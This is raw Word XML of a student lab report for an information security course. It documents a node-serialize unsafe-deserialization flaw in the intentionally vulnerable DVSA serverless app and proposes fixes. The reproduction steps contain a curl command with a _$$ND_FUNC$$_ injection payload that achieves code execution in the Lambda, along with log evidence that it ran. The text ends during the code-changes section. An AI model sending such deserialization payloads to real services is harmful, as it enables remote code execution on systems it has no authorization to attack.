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5104" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0AE3">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ICS344 - Information Security – Section 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C0A07" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A03C3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24AE4CE9" wp14:editId="4DC9552B">
            <wp:extent cx="2802131" cy="2606040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="135138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530" cy="261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86E2" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="002A0AE3" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0AE3">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Student Name(s) + ID(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E086BDC" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00501720" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Abdulwahab </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Badirah</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 202160410</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041EB603" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00501720" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Yazed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>almutairi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 202164390</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29393176" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00501720" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Abdulmuhaymin Althabit 202275600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B4154" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="002A0AE3" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501720">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mohammed Alfaraj 202323090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2075F59B" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0AE3">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DVSA Website URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685BF6B9" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="002A0AE3" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367F68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>http://dvsa-coptrz-sec-2026-157282994461-us-east-1.s3-website.us-east-1.amazonaws.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1518FC" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="002A0AE3" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0AE3">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Region:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C25D9E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>N. Virginia (us-east-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C4619" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="002A0AE3" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0AE3">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Date: 5/3/2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA2305" w14:textId="579E643E" w:rsidR="00CE726B" w:rsidRPr="00367F68" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367F68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Vulnerability Title(s):</w:t>
      </w:r>
      <w:r w:rsidRPr="00367F68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00367F68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t>Lesson 9: Vulnerable Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA5460" w14:textId="77777777" w:rsidR="000334C8" w:rsidRDefault="000334C8"/>
    <w:p w14:paraId="722864BE" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B"/>
    <w:p w14:paraId="2C2EEF4A" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B"/>
    <w:p w14:paraId="285746ED" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B"/>
    <w:p w14:paraId="7E7BDA73" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B"/>
    <w:p w14:paraId="54CEC6A8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1BA80BF3" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Lesson 9: Vulnerable Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DF38DB" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4694D94A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This lesson demonstrates a Vulnerable Dependency in the DVSA application. The affected component is the DVSA-ORDER-MANAGER Lambda function, which uses the node-serialize library to process user input. This library allows unsafe deserialization of attacker-controlled data. The impact is severe, as it enables remote code execution (RCE) inside the Lambda environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5760BA68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34DC0F68" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Why This Works / Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947EAA2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The vulnerability exists because the application uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57015198" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>serialize.unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>event.body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A42116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This function executes serialized JavaScript functions contained in user input. Since user input is not validated or sanitized, an attacker can inject malicious code that is executed during deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B964645" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F12B9E1" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Environment and Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C71CD79" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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4E4618A" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B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AWS Region: us-east-1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587EC904" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B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Service: AWS Lambda + API Gateway </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F28F26" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B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Function: DVSA-ORDER-MANAGER </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A5F78" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B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Log group: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">/lambda/DVSA-ORDER-MANAGER </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD8769" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B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Tool used: curl (CMD) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0BB0F" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142367AD" wp14:editId="2D4D19C9">
            <wp:extent cx="5731510" cy="2760980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="329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47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0837" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6488F0AF" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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User successfully logged into DVSA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74864715" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Application is accessible and functional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E61E4D7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6C9501D1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2B73967A" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60A15D" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721B147F" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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Open API endpoint /order </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE3052" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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Send malicious payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C067B9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curl -X POST "https://5zga32to6k.execute-api.us-east-1.amazonaws.com/Stage/order" ^</w:t>
      </w:r>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>-H "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>" ^</w:t>
      </w:r>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>-d "{\"action\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>":\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>"_$$ND_FUNC$$_function</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(){console.error</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>('LESSON9_TEST_SUCCESS')</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>;}(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>)\"}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757E4F1" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B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Check CloudWatch logs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6EF5C" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79494EFF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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E307DE" wp14:editId="7DB18CF0">
            <wp:extent cx="5731510" cy="410845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="144616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60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7DC9" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAE36DA" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B10D3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API Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141615F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{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>message":"Internal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> server error"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44413096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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F78C35C" wp14:editId="76EB67AD">
            <wp:extent cx="3181794" cy="238158"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="83178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4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B161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CloudWatch Log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E8EBC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LESSON9_TEST_SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27269A7D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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF54E16" wp14:editId="40C16DBF">
            <wp:extent cx="5731510" cy="2132330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="141347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5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7F3C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This proves attacker-controlled code executed inside Lambda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477AE1C2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5033BBD2" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB95A27" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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0C47577" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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Remove unsafe deserialization (node-serialize) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB3444" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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Replace with safe parsing (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>JSON.parse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3370ECF8" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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Validate input before processing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3FBEE3" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726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Reject malformed input </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8AC74F" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0CE80E" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F506E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BEFORE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692D62CD" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF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F545CF">
        <w:rPr>
